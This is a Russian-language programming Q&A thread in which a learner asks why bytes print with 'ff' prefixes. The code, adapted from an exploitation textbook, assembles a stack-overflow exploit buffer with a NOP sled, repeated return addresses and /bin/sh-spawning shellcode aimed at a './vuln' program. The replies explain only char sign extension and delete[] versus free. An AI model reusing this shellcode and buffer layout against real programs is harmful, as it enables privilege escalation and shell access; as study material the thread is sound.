# Архитектура 64-битной адресации. Помогите разобраться

Tags: c++, память, x86-64

Есть код (большая часть списана из книги "Хакинг: искусство эксплойта"):

```
#include <stdio.h>
#include <iostream>
#include <unistd.h>
using namespace std;

char shellcode[] = "\x31\xc0\xb0\x46\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0"
"\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d"
"\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73"
"\x68";

unsigned long sp() {
    __asm__("movl %esp, %eax");
}

int main(int argc, char **argv)
{
    int offset;
    long long esp, ret, *addr_ptr;
    char *buffer, *ptr;

    offset = 0;
    esp = sp();
    ret = esp - offset;

    printf("Stack pointer (ESP): 0x%llx\n", esp);
    printf("Offset from ESP: 0x%x\n", offset);
    printf("Desired return addres(ret): 0x%llx\n", ret);

    buffer = new char[600];

    ptr = buffer;
    addr_ptr = (long long*) ptr;

    for (int i = 0; i < 600; i++) {
        *(buffer + i) = 0;
    }

    for (int i = 0; i < 600; i+=8) {
        *(addr_ptr++) = ret;
    }

    for (int i = 0; i < 200; i++) {
        *(buffer + i) = '\x90';
    }

    ptr = buffer + 200;
    for (int i = 0; i < strlen(shellcode); i++) {
        *(ptr++) = shellcode[i];
    }
    buffer[600-1] = 0;

    for (int i = 0; i < 600; i++) {
        cout << hex << (long long)(buffer[i]) << ' ';
    }

    //execl("./vuln", "vuln", buffer, 0);
    free(buffer);
    return 0;
}
```

Когда вывожу массив на экран выдаёт:

```
    Stack pointer (ESP): 0x7ffeecc11a38
    Offset from ESP: 0x0 
Desired return addres(ret): 0x7ffeecc11a38

...
    ffffffffffffff90 ffffffffffffff90 ffffffffffffff90 ffffffffffffff90
 ffffffffffffff90 ffffffffffffff90 ffffffffffffff90 ffffffffffffff90 ffffffffffffff90 ffffffffffffff90 ffffffffffffff90 ffffffffffffff90
ffffffffffffff90 ffffffffffffff90 ffffffffffffff90 ffffffffffffff90 
ffffffffffffff90 ffffffffffffff90 ffffffffffffff90 ffffffffffffff90
ffffffffffffff90 ffffffffffffff90 31 ffffffffffffffc0 ffffffffffffffb0
46 ffffffffffffffdb 31 ffffffffffffffc9 ffffffffffffffcd 
ffffffffffffff80 ffffffffffffffeb 16 5b 31 ffffffffffffffc0 ffffffffffffff88 43 7 ffffffffffffff89 5b 8 ffffffffffffff89 43
c ffffffffffffffb0 b ffffffffffffff8d 4b 8 ffffffffffffff8d 53 c
ffffffffffffffcd ffffffffffffff80 ffffffffffffffe8 ffffffffffffffe5 ffffffffffffffff ffffffffffffffff ffffffffffffffff 2f 62 69 6e 2f 
73 68 7f 0 0 38 1a ffffffffffffffc1 ffffffffffffffec fffffffffffffffe 
7f 0 0 38 1a ffffffffffffffc1 ffffffffffffffec fffffffffffffffe 
7f 0 0 38 1a 
...
```

Откуда берутся эти ff? Я ожидал 00.

Comment: `(long long)(buffer[i])` вы приводите один байт к типу long long, тип конечно шире, но в нем так и остается значение одного байта, с расширением знакового разряда до 64 бит

Comment: `\x90`, будучи засунуто в знаковый `char`, дало отрицательное значение. Потом вы печатаете эти отрицательные значения как hex long long. Почему вы ожидали 00?

Comment: и, к слову, если выделяли память через new, то удаляйте с помощью delete[], а не с помощью free. Ну или выделяйте с помощью malloc.

Answer (score 1):

Для `char x = 0x90;` переменная `x` равна -112, потому что у вас char это знаковый тип.
Соответственно `(long long)-112` печатается как "ffffffffffffff90".

Напишите

```
cout << hex << (int)(unsigned char)buffer[i] << ' ';
```

Первый каст поменяет знаковый char на беззнаковый, второй каст нужен чтобы печаталось число, а не символ.